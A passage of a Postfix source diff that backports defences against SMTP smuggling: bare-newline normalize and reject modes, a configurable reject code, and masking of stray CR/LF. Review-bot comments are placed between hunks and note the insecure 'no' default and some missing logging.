<LF> received" ++# error. Require that input lines end in <CR><LF>, and require the ++# standard End\-of\-DATA sequence <CR><LF>.<CR><LF>. ++# ++# This will reject email from SMTP clients that send any non\-standard ++# line endings such as web applications, netcat, or load balancer ++# health checks. 
+ # +-smtpd_forbid_bare_newline = yes ++# This will also reject email from services that use BDAT to send ++# MIME text containing a bare newline (RFC 3030 Section 3 requires ++# canonical MIME format for text message types, defined in RFC 2045 ++# Sections 2.7 and 2.8). ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = reject + smtpd_forbid_bare_newline_exclusions = $mynetworks ++# ++# Alternatively, in the case of BDAT violations, BDAT can be selectively ++# disabled with smtpd_discard_ehlo_keyword_address_maps, or globally ++# disabled with smtpd_discard_ehlo_keywords. ++# ++# smtpd_discard_ehlo_keyword_address_maps = cidr:/path/to/file ++# /path/to/file: ++# 10.0.0.0/24 chunking, silent\-discard ++# smtpd_discard_ehlo_keywords = chunking, silent\-discard + .fi + .ad + .ft R + .in -4 + .PP ++This feature with settings \fByes\fR and \fBno\fR is available ++in Postfix 3.8.4, 3.7.9, 3.6.13, and 3.5.23. Additionally, the ++settings \fBreject\fR, and \fBnormalize\fR are available with ++Postfix >= 3.9, 3.8.5, 3.7.10, 3.6.14, and 3.5.24. ++.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. This setting uses the same syntax and parent\-domain ++matching behavior as mynetworks. ++.PP + This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, + 3.6.13, and 3.5.23. ++.SH smtpd_forbid_bare_newline_reject_code (default: 550) ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". ++Specify a 5XX status code (521 to disconnect). ++.PP ++This feature is available in Postfix >= 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. + .SH smtpd_forbidden_commands (default: CONNECT, GET, POST) + List of commands that cause the Postfix SMTP server to immediately + terminate the session with a 221 code. 
This can be used to disconnect +--- a/man/man8/cleanup.8 ++++ b/man/man8/cleanup.8 +@@ -163,6 +163,14 @@ + .IP "\fBmessage_strip_characters (empty)\fR" + The set of characters that Postfix will remove from message + content. ++.PP ++Available in Postfix version 3.9, 3.8.5, 3.7.10, 3.6.14, ++3.5.24, and later: ++.IP "\fBcleanup_replace_stray_cr_lf (yes)\fR" ++Replace each stray <CR> or <LF> character in message ++content with a space character, to prevent outbound SMTP smuggling, ++and to make the evaluation of Postfix\-added DKIM or other signatures ++independent from how a remote mail server handles such characters. + .SH "BEFORE QUEUE MILTER CONTROLS" + .na + .nf +--- a/man/man8/smtpd.8 ++++ b/man/man8/smtpd.8 +@@ -811,12 +811,17 @@ + .PP + Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: + .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" +-Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. ++Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. + .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" + Exclude the specified clients from smtpd_forbid_bare_newline + enforcement. ++.PP ++Available in Postfix 3.9, 3.8.5, 3.7.10, 3.6.14, 3.5.24 and ++later: ++.IP "\fBsmtpd_forbid_bare_newline_reject_code (550)\fR" ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". 
+ .SH "TARPIT CONTROLS" + .na + .nf +--- a/mantools/postlink ++++ b/mantools/postlink +@@ -547,8 +547,10 @@ + s;\bsmtpd_error_sleep_time\b;<a href="postconf.5.html#smtpd_error_sleep_time">$&</a>;g; + s;\bsmtpd_etrn_restrictions\b;<a href="postconf.5.html#smtpd_etrn_restrictions">$&</a>;g; + s;\bsmtpd_expansion_filter\b;<a href="postconf.5.html#smtpd_expansion_filter">$&</a>;g; +- s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline\b;<a href="postconf.5.html#smtpd_forbi d_bare_newline">$&</a>;g; +- s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline_exclusions\b;<a href="postconf.5.html# smtpd_forbid_bare_newline_exclusions">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line\b;<a href="postconf.5.html#smtpd_forbid_bare_newline">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line_reject_code\b;<a href="postconf.5.html#smtpd_forbid_bare_newline_reject_code">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_new[-</bB>]*\n*[ <bB>]*line_exclusions\b;<a href="postconf.5.html#smtpd_forbid_bare_newline_exclusions">$&</a>;g; ++ s;\bcleanup_replace_stray_cr_lf\b;<a href="postconf.5.html#cleanup_replace_stray_cr_lf">$&</a>;g; + s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bidden_commands\b;<a href="postconf.5.html#smtpd_forbidden_commands">$&</a>;g; + s;\bsmtpd_hard_error_limit\b;<a href="postconf.5.html#smtpd_hard_error_limit">$&</a>;g; + s;\bsmtpd_helo_required\b;<a href="postconf.5.html#smtpd_helo_required">$&</a>;g; +--- a/proto/postconf.proto ++++ b/proto/postconf.proto +@@ -18061,52 +18061,138 @@ + + %PARAM smtpd_forbid_bare_newline Postfix < 3.9: no + +-<p> Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. +-This feature is disbled by default with Postfix < 3.9. Use +-smtpd_forbid_bare_newline_exclusions to exclude non-standard clients +-such as netcat. 
Specify "smtpd_forbid_bare_newline = no" to disable +-(not recommended for an Internet-connected MTA). </p> ++<p> Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. Such line ++endings are commonly allowed with UNIX-based SMTP servers, but they ++violate RFC 5321, and allowing such line endings can make a server ++vulnerable to <a href="https://www.postfix.org/smtp-smuggling.html"> ++SMTP smuggling</a>. </p> ++ ++<p> Specify one of the following values (case does not matter): </p> ++ ++<dl compact> ++ ++<dt> <b>normalize</b></dt> <dd> Require the standard ++End-of-DATA sequence <CR><LF>.<CR><LF>. ++Otherwise, allow command or message content lines ending in the ++non-standard <LF>, and process them as if the client sent the ++standard <CR><LF>. <br> <br> This maintains compatibility ++with many legitimate SMTP client applications that send a mix of ++standard and non-standard line endings, but will fail to receive ++email from client implementations that do not terminate DATA content ++with the standard End-of-DATA sequence ++<CR><LF>.<CR><LF>. <br> <br> Such clients ++can be excluded with smtpd_forbid_bare_newline_exclusions. </dd> ++ ++<dt> <b>yes</b> </dt> <dd> Compatibility alias for <b>normalize</b>. </dd> ++ ++<dt> <b>reject</b> </dt> <dd> Require the standard End-of-DATA ++sequence <CR><LF>.<CR><LF>. Reject a command ++or message content when a line contains bare <LF>, log a "bare ++<LF> received" error, and reply with the SMTP status code in ++$smtpd_forbid_bare_newline_reject_code. <br> <br> This will reject ++email from SMTP clients that send any non-standard line endings ++such as web applications, netcat, or load balancer health checks. ++<br> <br> This will also reject email from services that use BDAT ++to send MIME text containing a bare newline (RFC 3030 Section 3 ++requires canonical MIME format for text message types, defined in ++RFC 2045 Sections 2.7 and 2.8). 
<br> <br> Such clients can be ++excluded with smtpd_forbid_bare_newline_exclusions (or, in the case ++of BDAT violations, BDAT can be selectively disabled with ++smtpd_discard_ehlo_keyword_address_maps, or globally disabled with ++smtpd_discard_ehlo_keywords). </dd> ++ ++<dt> <b>no</b> (default)</dt> <dd> Do not require the standard ++End-of-DATA ++sequence <CR><LF>.<CR><LF>. Always process ++a bare <LF> as if the client sent <CR><LF>. This ++option is fully backwards compatible, but is not recommended for ++an Internet-facing SMTP server, because it is vulnerable to <a ++href="https://www.postfix.org/smtp-smuggling.html"> SMTP smuggling</a>. ++</dd> + +-<p> See <a href="https://www.postfix.org/smtp-smuggling.html"> +-https://www.postfix.org/smtp-smuggling.html</a> for details. ++</dl> + +-<p> Example: </p> ++<p> Recommended settings: </p> + + <blockquote> + <pre> +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Require the standard End-of-DATA sequence <CR><LF>.<CR><LF>. ++# Otherwise, allow bare <LF> and process it as if the client sent ++# <CR><LF>. + # +-smtpd_forbid_bare_newline = yes ++# This maintains compatibility with many legitimate SMTP client ++# applications that send a mix of standard and non-standard line ++# endings, but will fail to receive email from client implementations ++# that do not terminate DATA content with the standard End-of-DATA ++# sequence <CR><LF>.<CR><LF>. ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = normalize + smtpd_forbid_bare_newline_exclusions = $mynetworks + </pre> + </blockquote> + +-<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, +-3.6.13, and 3.5.23. 
</p> +- +-%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks +- +-<p> Exclude the specified clients from smtpd_forbid_bare_newline +-enforcement. It uses the same syntax and parent-domain matching +-behavior as mynetworks. </p> +- +-<p> Example: </p> ++<p> Alternative: </p> + + <blockquote> + <pre> +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Reject input lines that contain <LF> and log a "bare <LF> received" ++# error. Require that input lines end in <CR><LF>, and require the ++# standard End-of-DATA sequence <CR><LF>.<CR><LF>. ++# ++# This will reject email from SMTP clients that send any non-standard ++# line endings such as web applications, netcat, or load balancer ++# health checks. ++# ++# This will also reject email from services that use BDAT to send ++# MIME text containing a bare newline (RFC 3030 Section 3 requires ++# canonical MIME format for text message types, defined in RFC 2045 ++# Sections 2.7 and 2.8). ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. + # +-smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline = reject + smtpd_forbid_bare_newline_exclusions = $mynetworks ++# ++# Alternatively, in the case of BDAT violations, BDAT can be selectively ++# disabled with smtpd_discard_ehlo_keyword_address_maps, or globally ++# disabled with smtpd_discard_ehlo_keywords. ++# ++# smtpd_discard_ehlo_keyword_address_maps = cidr:/path/to/file ++# /path/to/file: ++# 10.0.0.0/24 chunking, silent-discard ++# smtpd_discard_ehlo_keywords = chunking, silent-discard + </pre> + </blockquote> + ++<p> This feature with settings <b>yes</b> and <b>no</b> is available ++in Postfix 3.8.4, 3.7.9, 3.6.13, and 3.5.23. 
Additionally, the ++settings <b>reject</b>, and <b>normalize</b> are available with ++Postfix ≥ 3.9, 3.8.5, 3.7.10, 3.6.14, and 3.5.24. </p> ++ ++%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks ++ ++<p> Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. This setting uses the same syntax and parent-domain ++matching behavior as mynetworks. </p> ++ + <p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, + 3.6.13, and 3.5.23. </p> + ++%PARAM smtpd_forbid_bare_newline_reject_code 550 ++ ++<p> ++The numerical Postfix SMTP server response code when rejecting a ++request with "smtpd_forbid_bare_newline = reject". ++Specify a 5XX status code (521 to disconnect). ++</p> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. </p> ++ ++%PARAM cleanup_replace_stray_cr_lf yes ++ +--- a/src/cleanup/cleanup.c ++++ b/src/cleanup/cleanup.c +@@ -145,6 +145,14 @@ + /* .IP "\fBmessage_strip_characters (empty)\fR" + /* The set of characters that Postfix will remove from message + /* content. ++/* .PP ++/* Available in Postfix version 3.9, 3.8.5, 3.7.10, 3.6.14, ++/* 3.5.24, and later: ++/* .IP "\fBcleanup_replace_stray_cr_lf (yes)\fR" ++/* Replace each stray <CR> or <LF> character in message ++/* content with a space character, to prevent outbound SMTP smuggling, ++/* and to make the evaluation of Postfix-added DKIM or other signatures ++/* independent from how a remote mail server handles such characters. 
+ /* BEFORE QUEUE MILTER CONTROLS
+ /* .ad
+ /* .fi
+--- a/src/cleanup/cleanup_init.c
++++ b/src/cleanup/cleanup_init.c
+@@ -173,6 +173,7 @@
+ int var_always_add_hdrs; /* always add missing headers */
+ int var_virt_addrlen_limit; /* stop exponential growth */
+ char *var_hfrom_format; /* header_from_format */
++int var_cleanup_mask_stray_cr_lf; /* replace stray CR or LF with space */
+
+ const CONFIG_INT_TABLE cleanup_int_table[] = {
+ VAR_HOPCOUNT_LIMIT, DEF_HOPCOUNT_LIMIT, &var_hopcount_limit, 1, 0,
+@@ -189,6 +190,7 @@
+ VAR_VERP_BOUNCE_OFF, DEF_VERP_BOUNCE_OFF, &var_verp_bounce_off,
+ VAR_AUTO_8BIT_ENC_HDR, DEF_AUTO_8BIT_ENC_HDR, &var_auto_8bit_enc_hdr,
+ VAR_ALWAYS_ADD_HDRS, DEF_ALWAYS_ADD_HDRS, &var_always_add_hdrs,
++ VAR_CLEANUP_MASK_STRAY_CR_LF, DEF_CLEANUP_MASK_STRAY_CR_LF, &var_cleanup_mask_stray_cr_lf,
+ 0,
+ };
+
+--- a/src/cleanup/cleanup_message.c
++++ b/src/cleanup/cleanup_message.c
+@@ -930,6 +930,23 @@
+ char *dst;
+
+ /*
++ * Replace each stray CR or LF with one space. These are not allowed in
++ * SMTP, and can be used to enable outbound (remote) SMTP smuggling.
++ * Replacing these early ensures that our later DKIM etc. signature will
++ * not be invalidated. Besides preventing SMTP smuggling, replacing stray
++ * <CR> or <LF> ensures that the result of signature validation by a
++ * later mail system will not depend on how that mail system handles
++ * those stray characters in an implementation-dependent manner.
++ *
++ * The input length is not changed, therefore it is safe to overwrite the
++ * input.
++ */
++ if (var_cleanup_mask_stray_cr_lf)
++ for (dst = (char *) buf; dst < buf + len; dst++)
++ if (*dst == '\r' || *dst == '\n')
++ *dst = ' ';
++
++ /*
+ * Reject unwanted characters.
+ *
+ * XXX Possible optimization: simplify the loop when the "reject" set
+--- a/src/global/cleanup_strerror.c
++++ b/src/global/cleanup_strerror.c
+@@ -73,6 +73,7 @@
+ CLEANUP_STAT_CONT, 550, "5.7.1", "message content rejected",
+ CLEANUP_STAT_WRITE, 451, "4.3.0", "queue file write error",
+ CLEANUP_STAT_NOPERM, 550, "5.7.1", "service denied",
++ CLEANUP_STAT_BARE_LF, 521, "5.5.2", "bare <LF> received",
+ };
+
+ static CLEANUP_STAT_DETAIL cleanup_stat_success = {
+--- a/src/global/cleanup_user.h
++++ b/src/global/cleanup_user.h
+@@ -65,6 +65,12 @@
+ #define CLEANUP_STAT_NOPERM (1<<9) /* Denied by non-content policy */
+
+ /*
++ * Non-cleanup errors that live in the same bitmask space, to centralize
++ * error handling.
++ */
++#define CLEANUP_STAT_BARE_LF (1<<16) /* Bare <LF> received */
++
++ /*
+ * These are set when we can't bounce even if we were asked to.
+ */
+ #define CLEANUP_STAT_MASK_CANT_BOUNCE \
+--- a/src/global/mail_params.h
++++ b/src/global/mail_params.h
+@@ -4173,11 +4173,18 @@
+ * Backwards compatibility.
+ */
+ #define VAR_SMTPD_FORBID_BARE_LF "smtpd_forbid_bare_newline"
+-#define DEF_SMTPD_FORBID_BARE_LF 0
++#define DEF_SMTPD_FORBID_BARE_LF "no"
+
+ #define VAR_SMTPD_FORBID_BARE_LF_EXCL "smtpd_forbid_bare_newline_exclusions"
+ #define DEF_SMTPD_FORBID_BARE_LF_EXCL "$" VAR_MYNETWORKS
+
++#define VAR_SMTPD_FORBID_BARE_LF_CODE "smtpd_forbid_bare_newline_reject_code"
++#define DEF_SMTPD_FORBID_BARE_LF_CODE 550
++
++#define VAR_CLEANUP_MASK_STRAY_CR_LF "cleanup_replace_stray_cr_lf"
++#define DEF_CLEANUP_MASK_STRAY_CR_LF 1
++extern int var_cleanup_mask_stray_cr_lf;
++
+ /*
+ * Share TLS sessions through tlsproxy(8).
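Review bot: The new loop in the `@@ -930,6 +930,23 @@` hunk of cleanup_message.c writes through `(char *) buf`, and the comment justifies the in-place overwrite only by the unchanged length. The cast suggests `buf` is const-qualified in the signature (which is outside the hunk), so the overwrite is safe only if every caller hands in a writable record buffer; I would state that in the comment, e.g. `* The caller's buffer must be writable: the cast below drops a const qualifier.` Braces around the nested `for`/`if` would also make the three unbraced levels easier to audit. The enclosing function starts and ends outside the hunk.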
+ */
+--- a/src/global/smtp_stream.c
++++ b/src/global/smtp_stream.c
+@@ -51,7 +51,8 @@
+ /* char *format;
+ /* va_list ap;
+ /*
+-/* int smtp_forbid_bare_lf;
++/* int smtp_detect_bare_lf;
++/* int smtp_got_bare_lf;
+ /* AUXILIARY API
+ /* int smtp_get_noexcept(vp, stream, maxlen, flags)
+ /* VSTRING *vp;
+@@ -126,16 +127,16 @@
+ /* smtp_vprintf() is the machine underneath smtp_printf().
+ /*
+ /* smtp_get_noexcept() implements the subset of smtp_get()
+-/* without long jumps for timeout or EOF errors. Instead,
++/* without timeouts and without making long jumps. Instead,
+ /* query the stream status with vstream_feof() etc.
+-/* This function will make a VSTREAM long jump (error code
+-/* SMTP_ERR_LF) when rejecting input with a bare newline byte.
++/*
++/* This function assigns smtp_got_bare_lf = smtp_detect_bare_lf,
++/* if smtp_detect_bare_lf is non-zero and the last read line
++/* was terminated with a bare newline. Otherwise, this function
++/* sets smtp_got_bare_lf to zero.
+ /*
+ /* smtp_timeout_setup() is a backwards-compatibility interface
+ /* for programs that don't require per-record deadline support.
+-/*
+-/* smtp_forbid_bare_lf controls whether smtp_get_noexcept()
+-/* will reject input with a bare newline byte.
+ /* DIAGNOSTICS
+ /* .fi
+ /* .ad
+@@ -208,7 +209,8 @@
+
+ #include "smtp_stream.h"
+
+-int smtp_forbid_bare_lf;
++int smtp_detect_bare_lf;
++int smtp_got_bare_lf;
+
+ /* smtp_timeout_reset - reset per-stream error flags, restart deadline timer */
+
+@@ -371,6 +373,8 @@
+ int last_char;
+ int next_char;
+
++ smtp_got_bare_lf = 0;
++
+ /*
+ * It's painful to do I/O with records that may span multiple buffers.
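Review bot: `DEF_SMTPD_FORBID_BARE_LF` stays at `"no"` in the mail_params.h hunk, so an image built with this backport still treats a bare <LF> as <CR><LF> from remote clients unless main.cf overrides it; the patch's own documentation calls `no` not recommended for an Internet-facing server because it is vulnerable to SMTP smuggling. Only the outbound side is enabled by default (`DEF_CLEANUP_MASK_STRAY_CR_LF 1`). If the recipe ships a main.cf, it should carry the documented recommended pair `smtpd_forbid_bare_newline = normalize` and `smtpd_forbid_bare_newline_exclusions = $mynetworks`; whether it does is not visible in this part of the commit.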
+ * Allow for partial long lines (we will read the remainder later) and
+@@ -413,11 +417,15 @@
+ */
+ case '\n':
+ vstring_truncate(vp, VSTRING_LEN(vp) - 1);
+- if (smtp_forbid_bare_lf
+- && (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r'))
+- vstream_longjmp(stream, SMTP_ERR_LF);
+- while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == '\r')
+- vstring_truncate(vp, VSTRING_LEN(vp) - 1);
++ if (smtp_detect_bare_lf) {
++ if (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r')
++ smtp_got_bare_lf = smtp_detect_bare_lf;
++ else
++ vstring_truncate(vp, VSTRING_LEN(vp) - 1);
++ } else {
++ while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == '\r')
++ vstring_truncate(vp, VSTRING_LEN(vp) - 1);
++ }
+ VSTRING_TERMINATE(vp);
+ /* FALLTRHOUGH */
+
+--- a/src/global/smtp_stream.h
++++ b/src/global/smtp_stream.h
+@@ -32,7 +32,6 @@
+ #define SMTP_ERR_QUIET 3 /* silent cleanup (application) */
+ #define SMTP_ERR_NONE 4 /* non-error case */
+ #define SMTP_ERR_DATA 5 /* application data error */
+-#define SMTP_ERR_LF 6 /* bare <LF> protocol error */
+
+ extern void smtp_stream_setup(VSTREAM *, int, int);
+ extern void PRINTFLIKE(2, 3) smtp_printf(VSTREAM *, const char *,...);
+@@ -44,7 +43,8 @@
+ extern void smtp_fwrite(const char *, ssize_t len, VSTREAM *);
+ extern void smtp_fread_buf(VSTRING *, ssize_t len, VSTREAM *);
+ extern void smtp_fputc(int, VSTREAM *);
+-extern int smtp_forbid_bare_lf;
++extern int smtp_detect_bare_lf;
++extern int smtp_got_bare_lf;
+
+ extern void smtp_vprintf(VSTREAM *, const char *, va_list);
+
+--- a/src/smtpd/smtpd.c
++++ b/src/smtpd/smtpd.c
+@@ -765,12 +765,17 @@
+ /* .PP
+ /* Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later:
+ /* .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR"
+-/* Reply with "Error: bare <LF> received" and disconnect
+-/* when a remote SMTP client sends a line ending in <LF>, violating
+-/* the RFC 5321 requirement that lines must end in <CR><LF>.
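Review bot: The two branches of the new `if (smtp_detect_bare_lf)` in the `@@ -413,11 +417,15 @@` hunk of smtp_stream.c strip carriage returns differently, and the code does not say so. With detection on, exactly one <CR> is removed, so input ending in <CR><CR><LF> keeps a trailing <CR> in the returned line, while the `else` branch still strips all of them. A comment on the single `vstring_truncate()` such as `/* Strip only the CR of CRLF; any further CR stays in the line. */` would document the asymmetry; the smtpd.c comment later in this patch says bare CR is handled elsewhere, but where is not visible here. The function starts outside the hunk.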
++/* Reject or restrict input lines from an SMTP client that end in
++/* <LF> instead of the standard <CR><LF>.
+ /* .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR"
+ /* Exclude the specified clients from smtpd_forbid_bare_newline
+ /* enforcement.
++/* .PP
++/* Available in Postfix 3.9, 3.8.5, 3.7.10, 3.6.14, 3.5.24 and
++/* later:
++/* .IP "\fBsmtpd_forbid_bare_newline_reject_code (550)\fR"
++/* The numerical Postfix SMTP server response code when rejecting a
++/* request with "smtpd_forbid_bare_newline = reject".
+ /* TARPIT CONTROLS
+ /* .ad
+ /* .fi
+@@ -1476,8 +1481,10 @@
+ int var_smtpd_uproxy_tmout;
+ bool var_relay_before_rcpt_checks;
+
+-bool var_smtpd_forbid_bare_lf;
++char *var_smtpd_forbid_bare_lf;
+ char *var_smtpd_forbid_bare_lf_excl;
++int var_smtpd_forbid_bare_lf_code;
++static int bare_lf_mask;
+ static NAMADR_LIST *bare_lf_excl;
+
+ /*
+@@ -1554,7 +1561,6 @@
+ #define REASON_TIMEOUT "timeout"
+ #define REASON_LOST_CONNECTION "lost connection"
+ #define REASON_ERROR_LIMIT "too many errors"
+-#define REASON_BARE_LF "bare <LF> received"
+
+ #ifdef USE_TLS
+
+@@ -1573,6 +1579,40 @@
+ */
+ static DICT *smtpd_cmd_filter;
+
++ /*
++ * Bare LF and End-of-DATA controls (bare CR is handled elsewhere).
++ *
++ * At the smtp_get*() line reader level, setting any of these flags in the
++ * smtp_detect_bare_lf variable enables the detection of bare newlines. The
++ * line reader will set the same flags in the smtp_got_bare_lf variable
++ * after it detects a bare newline, otherwise it clears smtp_got_bare_lf.
++ *
++ * At the SMTP command level, the flags in smtp_got_bare_lf control whether
++ * commands ending in a bare newline are rejected.
++ *
++ * At the DATA and BDAT content level, the flags in smtp_got_bare_lf control
++ * whether the standard End-of-DATA sequence CRLF.CRLF is required, and
++ * whether lines ending in bare newlines are rejected.
++ *
++ * Postfix implements "delayed reject" after detecting a bare newline in BDAT
++ * or DATA content. The SMTP server delays a REJECT response until the
++ * command is finished, instead of replying and hanging up immediately. The
++ * End-of-DATA detection is secured with BARE_LF_FLAG_WANT_STD_EOD.
++ */
++#define BARE_LF_FLAG_WANT_STD_EOD (1<<0) /* Require CRLF.CRLF */
++#define BARE_LF_FLAG_REPLY_REJECT (1<<1) /* Reject bare newline */
++
++#define IS_BARE_LF_WANT_STD_EOD(m) ((m) & BARE_LF_FLAG_WANT_STD_EOD)
++#define IS_BARE_LF_REPLY_REJECT(m) ((m) & BARE_LF_FLAG_REPLY_REJECT)
++
++static const NAME_CODE bare_lf_mask_table[] = {
++ "normalize", BARE_LF_FLAG_WANT_STD_EOD, /* Default */
++ "yes", BARE_LF_FLAG_WANT_STD_EOD, /* Migration aid */
++ "reject", BARE_LF_FLAG_WANT_STD_EOD | BARE_LF_FLAG_REPLY_REJECT,
++ "no", 0,
++ 0, -1, /* error */
++};
++
+ #ifdef USE_SASL_AUTH
+
+ /*
+@@ -3515,6 +3555,7 @@
+ int curr_rec_type;
+ int prev_rec_type;
+ int first = 1;
++ int prev_got_bare_lf = 0;
+
+ /*
+ * Copy the message content. If the cleanup process has a problem, keep
+@@ -3528,12 +3569,15 @@
+ * XXX Deal with UNIX-style From_ lines at the start of message content
+ * because sendmail permits it.
+ */
+- for (prev_rec_type = 0; /* void */ ; prev_rec_type = curr_rec_type) {
++ for (prev_rec_type = 0; /* void */ ; prev_rec_type = curr_rec_type,
++ prev_got_bare_lf = smtp_got_bare_lf) {
+ if (smtp_get(state->buffer, state->client, var_line_limit,
+ SMTP_GET_FLAG_NONE) == '\n')
+ curr_rec_type = REC_TYPE_NORM;
+ else
+ curr_rec_type = REC_TYPE_CONT;
++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf))
++ state->err |= CLEANUP_STAT_BARE_LF;
+ start = vstring_str(state->buffer);
+ len = VSTRING_LEN(state->buffer);
+ if (first) {
+@@ -3546,9 +3590,14 @@
+ if (len > 0 && IS_SPACE_TAB(start[0]))
+ out_record(out_stream, REC_TYPE_NORM, "", 0);
+ }
+- if (prev_rec_type != REC_TYPE_CONT && *start == '.'
+- && (proxy == 0 ?
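Review bot: The `/* Default */` comment on the `"normalize"` row of `bare_lf_mask_table` in the `@@ -1573,6 +1579,40 @@` hunk of smtpd.c does not match this backport. mail_params.h in the same patch sets `DEF_SMTPD_FORBID_BARE_LF` to `"no"`, and the parameter documentation gives the default as `no` for Postfix < 3.9. I would change the comment to `/* Default in Postfix >= 3.9 */` so that nobody reading the table assumes End-of-DATA normalization is active out of the box on this version.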
(++start, --len) == 0 : len == 1))
+- break;
++ if (prev_rec_type != REC_TYPE_CONT && *start == '.') {
++ if (len == 1 && IS_BARE_LF_WANT_STD_EOD(smtp_detect_bare_lf)
++ && (smtp_got_bare_lf || prev_got_bare_lf))
++ /* Do not store or send to proxy filter. */
++ continue;
++ if (proxy == 0 ? (++start, --len) == 0 : len == 1)
++ break;
++ }
+ if (state->err == CLEANUP_STAT_OK) {
+ if (ENFORCING_SIZE_LIMIT(var_message_limit)
+ && var_message_limit - state->act_size < len + 2) {
+@@ -3701,6 +3750,11 @@
+ else
+ smtpd_chat_reply(state,
+ "250 2.0.0 Ok: queued as %s", state->queue_id);
++ } else if ((state->err & CLEANUP_STAT_BARE_LF) != 0) {
++ state->error_mask |= MAIL_ERROR_PROTOCOL;
++ log_whatsup(state, "reject", "bare <LF> received");
++ smtpd_chat_reply(state, "%d 5.5.2 %s Error: bare <LF> received",
++ var_smtpd_forbid_bare_lf_code, var_myhostname);
+ } else if (why && IS_SMTP_REJECT(STR(why))) {
+ state->error_mask |= MAIL_ERROR_POLICY;
+ smtpd_chat_reply(state, "%s", STR(why));
+@@ -3981,7 +4035,6 @@
+ */
+ done = 0;
+ do {
+- int payload_err;
+
+ /*
+ * Do not skip the smtp_fread_buf() call if read_len == 0. We still
+@@ -3995,10 +4048,6 @@
+ smtp_fread_buf(state->buffer, read_len, state->client);
+ state->bdat_get_stream = vstream_memreopen(
+ state->bdat_get_stream, state->buffer, O_RDONLY);
+- vstream_control(state->bdat_get_stream, CA_VSTREAM_CTL_EXCEPT,
+- CA_VSTREAM_CTL_END);
+- if ((payload_err = vstream_setjmp(state->bdat_get_stream)) != 0)
+- vstream_longjmp(state->client, payload_err);
+
+ /*
+ * Read lines from the fragment. The last line may continue in the
+@@ -4023,6 +4072,8 @@
+ /* Skip the out_record() and VSTRING_RESET() calls below.
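Review bot: In the `@@ -3546,9 +3590,14 @@` hunk of smtpd.c the new `continue` discards a lone "." line that arrived with, or right after, a bare <LF> and logs nothing, so in `normalize` mode a non-standard End-of-DATA leaves no trace for the operator. A client that really ends DATA this way will also just sit there until it times out, which is hard to diagnose from the logs alone. I would record the drop before the `continue`, for instance with the helper this patch already uses elsewhere, `log_whatsup(state, "info", "non-standard End-of-DATA ignored");` (label to be checked against the helper's definition, which is not on this page), and put braces around the `if` body now that it holds a comment plus a statement. The loop body continues outside the hunk.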
